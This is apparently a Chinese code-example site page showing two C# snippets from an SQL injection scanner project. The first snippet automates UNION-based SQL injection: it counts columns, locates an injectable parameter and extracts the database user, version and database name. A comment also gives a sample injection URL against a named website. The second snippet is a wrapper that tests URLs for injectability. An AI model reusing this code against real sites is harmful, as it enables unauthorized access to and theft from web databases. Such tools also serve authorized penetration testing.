C# (CSharp) SQl_SCanner sqli_check.demmareAnalyseFast示例

编程语言: C# (CSharp)

命名空间/包名称: SQl_SCanner

类/类型: sqli_check

方法/功能: demmareAnalyseFast

hotexamples.com的示例: 2

C# (CSharp) SQl_SCanner sqli_check.demmareAnalyseFast - 已找到2个示例。这些是从开源项目中提取的最受好评的SQl_SCanner.sqli_check.demmareAnalyseFast现实C# (CSharp)示例。您可以评价示例，以帮助我们提高示例质量。

常用方法

显示隐藏

demmareAnalyseFast(2)

demmareAnalyseAvanced(1)

示例#1

显示文件

        /*
         * //EXCEPTION
         *  http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
         *
         *
         */
        public void Analyse(string url)
        {
            form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
            {
                form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
            }));
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                bool[] ok = new bool[2];
                ok[0] = vrf.demmareAnalyseFast(url);
                ok[1] = vrf.demmareAnalyseAvanced(url);
                if (ok[0] || ok[1])
                {
                    int u = 0; //Union Style 1
                    while (!point_trv && u < _union.Count)
                    {
                        _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
                        onFait((u + 1).ToString());
                        for (int p = 0; p < _param.Count; p++)
                        {
                            _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                            url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                            inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                            string page = hr.get(inj_point_curr);
                            if (page.Contains(separateur) || page.Contains(s_separateur))
                            {
                                setResult(page, url_inj_point);
                                point_trv = true;
                                break;
                            }
                        }
                        u++;
                    }
                }
                else
                {
                    form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
                    {
                        form.txt_statut_analyse.Text = "Injection char echouer :( ";
                    }));
                }
            }
        }

示例#2

显示文件

 public bool SQLi(string url)
 {
     if (!url.Contains("="))
     {
         return(false);
     }
     else
     {
         sqli_check sqli = new sqli_check();
         if (sqli.demmareAnalyseFast(url))
         {
             return(true);
         }
         else
         {
             return(false);
         }
     }
 }